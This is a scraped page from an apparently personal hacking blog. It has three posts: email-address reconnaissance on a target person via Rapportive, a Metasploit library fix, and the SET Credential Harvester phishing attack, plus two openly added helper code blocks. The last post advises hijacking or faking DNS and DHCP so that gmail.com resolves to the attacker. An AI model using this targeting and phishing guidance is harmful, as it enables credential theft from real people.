<div class="MsoNormal" style="margin-bottom: 13.5pt; margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;">1. <b>Find out the Person</b>: Go to the site of that
company and find out whom you have to deal with, i.e. the person whose email ID
you will find out. If you are unlucky, you may not get anything. Don't lose
hope. Go to Google and give some commands in its search bar. Within a short
span of time, you will have the name of the person you have to target.</span></div>
<div class="MsoNormal" style="margin-bottom: 13.5pt; margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;">2. <b>Use Rapportive: </b>We will be using the <a href="http://rapportive.com/"><span style="color: blue;">Rapportive </span></a>extension
to reverse engineer the email ID, so load your browser with this extension.</span></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;">3. <b>Integrate it with Gmail: </b>Once you have installed Rapportive, open Gmail in a new tab and
you will see a "Rapportive" link appearing on your screen.</span></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sbBkzH_hZ6dBfSDaGHiELq8rqbLyh44CiWj0T4wNtKZsaBUeeOqyrMIbsTrzmmmb4Kf3NsWb-xaBbUPB7_naxF0V8upyAXMBXaNQvT_gfFAI7tsfUgaKrq_0zXf1aH9NwhkxL91eN6jD/s1600/rapor1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-indent: 0px;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_sbBkzH_hZ6dBfSDaGHiELq8rqbLyh44CiWj0T4wNtKZsaBUeeOqyrMIbsTrzmmmb4Kf3NsWb-xaBbUPB7_naxF0V8upyAXMBXaNQvT_gfFAI7tsfUgaKrq_0zXf1aH9NwhkxL91eN6jD/s400/rapor1.PNG" width="400" /></a>
</span></div>
<span style="font-family: inherit;"><br />
You can also integrate it with your other social accounts.</span><br />
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in; text-indent: -.25in;">
<span style="font-family: inherit;"><br /></span></div>
<div align="center" class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;">
</div>
<div style="text-align: left;">
<span style="font-family: inherit;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ngTJz9w9ehIYDRmdiexC-CuA_4gMF3GwJrv7EPwNivi1epsiJZxnFfNB1TZqSDK7rk-_-jyx992dgQqIZzY9OWyxFImPNNPw3PawGTm-EU0W6Ev3jvj607mWaGoFh5I36LnqyG-D2eho/s1600/rappor2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3ngTJz9w9ehIYDRmdiexC-CuA_4gMF3GwJrv7EPwNivi1epsiJZxnFfNB1TZqSDK7rk-_-jyx992dgQqIZzY9OWyxFImPNNPw3PawGTm-EU0W6Ev3jvj607mWaGoFh5I36LnqyG-D2eho/s320/rappor2.png" width="320" /></a> </span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;"><b>Reverse Engineer the Email IDs: </b>Finally, we have to try some common combinations like <i><span style="color: #cc0000;">firstname.L@company.com, firstname@company.com, firstname.lastname@company.com, firstname.LE@company.com, f.lastname@company.com. </span></i>As you try them, you will get one of the following two responses:</span><br />
<br />
Example: Rapportive Profile Not Found<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgLS3POtI46dCS0lC59ouBt5Mu56lhdza-McH5tpxpgryvQoaE1b7c77MxG2DvbQTw-otLq1GH6Pg1aesNLoRnX7LGmju8z_Ugd0MhhM8Ch1YXxZ9ws8f2Iq99gwbb6kjt4noThh8oSoX/s1600/r3.png" imageanchor="1" style="font-family: inherit; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTgLS3POtI46dCS0lC59ouBt5Mu56lhdza-McH5tpxpgryvQoaE1b7c77MxG2DvbQTw-otLq1GH6Pg1aesNLoRnX7LGmju8z_Ugd0MhhM8Ch1YXxZ9ws8f2Iq99gwbb6kjt4noThh8oSoX/s400/r3.png" width="400" /></a><br />
<br />
<span style="text-indent: 48px;">Example: Rapportive Profile Found</span><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_ipBfjGlTRRUZHdLMG27VnguROjUFAhpDAWmbNLVPTLHTQcaTlCLJnQ06FfBEG0czUK9TkkWSOXC2MTxa3yafhBcx-zJl3M7-xWBCp8CZHb-tc9gYsidncvlqSi7EA6dlml_I8LLMzfW/s1600/r4.png" imageanchor="1" style="font-family: inherit; margin-left: 1em; margin-right: 1em; text-align: center; text-indent: 48px;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3_ipBfjGlTRRUZHdLMG27VnguROjUFAhpDAWmbNLVPTLHTQcaTlCLJnQ06FfBEG0czUK9TkkWSOXC2MTxa3yafhBcx-zJl3M7-xWBCp8CZHb-tc9gYsidncvlqSi7EA6dlml_I8LLMzfW/s400/r4.png" width="400" /></a></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">Once you have this, you also have their Twitter and other accounts.
But the story doesn't end here. You also need to verify these
accounts. If it is a <b>Twitter </b>account, check the number of their followers. If the
profile seems to be active and connections are more than 400, then it must be
fine. The reason I am putting emphasis on Twitter: if you mention anything
with <i><b>@their_twitter_name,</b></i> it will send a direct notification to them.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">Similarly, for their <b>LinkedIn </b>account, if they have fewer than <i>500
connections</i>, that may raise doubts about whether they use it properly and,
moreover, whether they accept connections at all.</span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">Their <b>Google Account</b> can be checked similarly, by the working
status of the profile. Sometimes even a <b>phone number</b> is found, but don't get
greedy. Don't make a call until you are a good<i> Social Engineer.</i></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: inherit;">So, with this stuff, I wish you best of luck, mates. I hope you
are not going to mess up.</span></div>
Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com190tag:blogger.com,1999:blog-1976569363702642300.post-55743006800408297412012-08-06T07:47:00.002-07:002012-08-06T08:14:20.865-07:00Msfupdate not working with "no version information available" error.<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A few days back, while working on my testing and research, I came across an error which was continuously preventing me from updating my Metasploit Framework. The error message was something like this:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJkoTfkWxpCOt5Q0J6TG2OCBGbOaGy5Ibj38-fwGEGrRMZaVcZOIhW_E18saixqP9JnshC7-rSZNh0Af_JJ08Q7y9LpJBgLl7KJW8bHlpEBA4aTop9yNBJzB-q8oY6W6H7KCatdpYWUmU/s1600/error1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJJkoTfkWxpCOt5Q0J6TG2OCBGbOaGy5Ibj38-fwGEGrRMZaVcZOIhW_E18saixqP9JnshC7-rSZNh0Af_JJ08Q7y9LpJBgLl7KJW8bHlpEBA4aTop9yNBJzB-q8oY6W6H7KCatdpYWUmU/s400/error1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
"No version available" and blah blah blah. I ignored it for a couple of days due to workload and downloaded exploits manually. But when that started to seem kiddish to me, I got to the root of it. I soon realized that the "no version information available" error here meant that the library Metasploit was loading had no version information to refer to, and hence it was not updating to any further version. Quite kiddish, but realistic too. So I checked its libraries:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW-ic82sqrHcG9F3WUCJEAOaUga-Lqw18uRaIqGDS6LQkOMMXPHY7eZ2SRb75e-pLu2H1HXk8Gy0KjXP012HyETuU7oVwIoa1jEvnAzo0GIYeTzraqMTRAIbyNJf2Q4-PL5I1N5ATXqgFX/s1600/error2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW-ic82sqrHcG9F3WUCJEAOaUga-Lqw18uRaIqGDS6LQkOMMXPHY7eZ2SRb75e-pLu2H1HXk8Gy0KjXP012HyETuU7oVwIoa1jEvnAzo0GIYeTzraqMTRAIbyNJf2Q4-PL5I1N5ATXqgFX/s400/error2.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
libssl.so.0.9.8 does not have a link to /usr/lib/, whereas the entire library actually relies on it. So what we need to do is: </div>
<div class="separator" style="clear: both; text-align: left;">
1. Back up the library that is causing msf to error.</div>
<div class="separator" style="clear: both; text-align: left;">
2. Create a link between the msf library and /usr/lib/.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Do this : </div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXyE2CRjE4z91mIlzZ8ZrwsxduxI0GQuD162iN8qdREQWg2a9QD4yl83RBlwN5ynKZCFX8YmVmL3EEUF7-qLkQu6cBNHTYbs9vaq04Dt3KCJSL-9jD4CSvKzXG3VzR2SwnMD_xdScjvBO/s1600/error3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXyE2CRjE4z91mIlzZ8ZrwsxduxI0GQuD162iN8qdREQWg2a9QD4yl83RBlwN5ynKZCFX8YmVmL3EEUF7-qLkQu6cBNHTYbs9vaq04Dt3KCJSL-9jD4CSvKzXG3VzR2SwnMD_xdScjvBO/s400/error3.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
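<div class="separator" style="clear: both; text-align: left;">
The commands in the screenshot above are not recoverable as text, so here is an added helper (not from the original post) that performs the two steps, back up and then link, with the checks an administrator wants before touching a shared library: it verifies the source exists, refuses to overwrite an existing backup, and reports whether the resulting link is correct. The library name libssl.so.0.9.8 is the one from the post; the directory layout, in particular where the msf library directory lives and which side becomes the link, is an assumption you supply as arguments after confirming it with <code>ldd</code> on the failing binary.</div>

```shell
#!/bin/sh
# Added helper, not code from the original post. The library name comes from
# the post; SRC_DIR and LINK_DIR are assumptions about your install.

# check_lib_link NAME SRC_DIR LINK_DIR
#   Prints one word and returns 0 only when LINK_DIR/NAME is a symlink
#   pointing at an existing SRC_DIR/NAME.
check_lib_link() {
    name="$1"; src_dir="$2"; link_dir="$3"
    src="$src_dir/$name"
    link="$link_dir/$name"
    if [ ! -e "$src" ]; then
        echo "missing-source"; return 1
    fi
    if [ ! -e "$link" ] && [ ! -L "$link" ]; then
        echo "missing"; return 1
    fi
    if [ -L "$link" ]; then
        if [ "$(readlink "$link")" = "$src" ]; then
            echo "ok"; return 0
        fi
        echo "wrong-target"; return 1
    fi
    echo "not-a-link"; return 1
}

# relink_lib NAME SRC_DIR LINK_DIR
#   Moves any existing LINK_DIR/NAME aside as NAME.bak (the backup step from
#   the post), then creates the symlink. Refuses to run when a backup already
#   exists, so a second invocation cannot destroy the original copy.
relink_lib() {
    name="$1"; src_dir="$2"; link_dir="$3"
    src="$src_dir/$name"
    link="$link_dir/$name"
    if [ ! -e "$src" ]; then
        echo "source $src does not exist" >&2; return 1
    fi
    if [ -e "$link" ] || [ -L "$link" ]; then
        if [ -e "$link.bak" ] || [ -L "$link.bak" ]; then
            echo "backup $link.bak already exists, refusing to overwrite" >&2
            return 1
        fi
        mv "$link" "$link.bak" || return 1
    fi
    ln -s "$src" "$link"
}

# Usage (commented out so the file is safe to source; replace the
# placeholder path with your msf library directory):
#   check_lib_link libssl.so.0.9.8 /usr/lib /path/to/msf/lib
#   relink_lib     libssl.so.0.9.8 /usr/lib /path/to/msf/lib
#   check_lib_link libssl.so.0.9.8 /usr/lib /path/to/msf/lib   # expect: ok
```

<div class="separator" style="clear: both; text-align: left;">
Run <code>check_lib_link</code> before and after <code>relink_lib</code>; the first call should report <code>not-a-link</code> (a real file is shadowing the system copy) and the second <code>ok</code>. Keep the <code>.bak</code> file until the update has succeeded, since it is the only copy of whatever the package shipped.</div>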
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Once you are done with all this, go ahead and update your Metasploit. You will get a smile on your face.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpjGaE-KkXq0_DMEf9eGltWJTdkEZi49wnlGHubTaDLeas3T3-GCg8hB30bxnzEHx43veZKTgFOc-7zV8cM45bZvcYjFp8RqvYS0a-XJL3z9VVfk9sheZZCqC6GZsG8kL699Yb_zKqpY1/s1600/error4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpjGaE-KkXq0_DMEf9eGltWJTdkEZi49wnlGHubTaDLeas3T3-GCg8hB30bxnzEHx43veZKTgFOc-7zV8cM45bZvcYjFp8RqvYS0a-XJL3z9VVfk9sheZZCqC6GZsG8kL699Yb_zKqpY1/s400/error4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
(Click on Image to Enlarge)
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So this is why you don't need to postpone your work whenever you hit an error somewhere, just like in the case of msf. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Enjoy hacking, enjoy exploitation. :)</div>
<br />
<br />Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com413tag:blogger.com,1999:blog-1976569363702642300.post-58011459209468302832012-07-29T12:10:00.001-07:002015-05-04T00:06:35.327-07:00Email Hacking using Credential Harvester Attack (SET)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: left;">
Learn how to write your own hacking tools in python:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="http://resources.infosecinstitute.com/writing-hacking-tools-with-python-part-1/">http://resources.infosecinstitute.com/writing-hacking-tools-with-python-part-1/ </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This video covers the Credential Harvester Attack of the Social Engineering Toolkit, which is basically used to make an automated clone of a site and collect the victim's credentials.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I did it with a small setup: one machine with BackTrack installed and another running XP as the victim.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='640' height='360' src='https://www.youtube.com/embed/c8hCEYPM5rM?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
However, a small issue comes with it. Why would the victim open your IP? </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Well, simple: get into the DNS server, or create a fake DNS server and DHCP, and start handing out IPs under your own authority. Once you are done with the fake DNS, make a fake entry for gmail.com pointing to your fake IP address. </div>
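<div class="separator" style="clear: both; text-align: left;">
From the defender's side, the setup just described leaves a telltale sign: a public mail domain suddenly resolves to an address on the local network. The following check, an added example that is not part of the original post or of the Social Engineering Toolkit, flags that condition as a high-confidence finding and, as a weaker signal, answers that share nothing with what a trusted resolver returned. The domain names and addresses below are constructed sample data, not real resolver output.</div>

```python
"""Spot a locally spoofed DNS answer for a public domain.

Added example, not code from the original post or from the Social Engineering
Toolkit. The resolver answers below are constructed sample data.
"""
import ipaddress
from typing import Dict, List, Optional

# Constructed: what the local (possibly rogue) resolver returned per domain.
SAMPLE_OBSERVED: Dict[str, List[str]] = {
    "gmail.com":       ["192.168.1.50"],   # public mail domain -> LAN host
    "mail.google.com": ["192.168.1.50"],
    "example.com":     ["93.184.216.34"],
    "cdn.example.net": ["172.217.0.9"],    # differs from reference, still global
}

# Constructed: what a resolver you trust returned for the same names.
SAMPLE_REFERENCE: Dict[str, List[str]] = {
    "gmail.com":       ["172.217.0.1"],
    "mail.google.com": ["172.217.0.2"],
    "example.com":     ["93.184.216.34"],
    "cdn.example.net": ["172.217.0.5"],
}


def verdict(observed: List[str], reference: Optional[List[str]] = None) -> str:
    """Classify one domain's answers.

    "high":    at least one answer is not globally routable (private, loopback,
               link-local, documentation ranges, ...); a public name should
               never resolve to such an address from inside a LAN.
    "low":     every answer is global but none overlaps the trusted resolver's;
               CDNs and anycast make this noisy, so it is only a weak signal.
    "invalid": an answer is not a parseable IP address at all.
    "ok":      nothing suspicious.
    """
    try:
        addrs = [ipaddress.ip_address(ip) for ip in observed]
    except ValueError:
        return "invalid"
    if any(not a.is_global for a in addrs):
        return "high"
    if observed and reference and set(observed).isdisjoint(reference):
        return "low"
    return "ok"


def scan(observed: Dict[str, List[str]],
         reference: Dict[str, List[str]]) -> Dict[str, str]:
    """Run verdict() over every observed domain."""
    return {name: verdict(ips, reference.get(name))
            for name, ips in observed.items()}


def report(observed: Dict[str, List[str]],
           reference: Dict[str, List[str]]) -> List[str]:
    """Human-readable lines, most severe first."""
    order = {"high": 0, "invalid": 1, "low": 2, "ok": 3}
    results = scan(observed, reference)
    return [f"{results[name]:7} {name} -> {', '.join(observed[name])}"
            for name in sorted(results, key=lambda n: (order[results[n]], n))]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_OBSERVED, SAMPLE_REFERENCE)))
```

<div class="separator" style="clear: both; text-align: left;">
In practice the "observed" answers come from whatever resolver DHCP handed the client, and the "reference" answers from a resolver reached by a path the LAN cannot tamper with. Only the "high" verdict is worth alerting on by itself; the "low" one is a hint to compare further, because large mail providers legitimately return different addresses to different resolvers.</div>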
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
In case any issue comes in between, feel free to contact me at upgoingstaar@gmail.com :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Stay Focused, Keep Hacking.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br /></div>
Shubham Mittalhttp://www.blogger.com/profile/16532487601818259817noreply@blogger.com202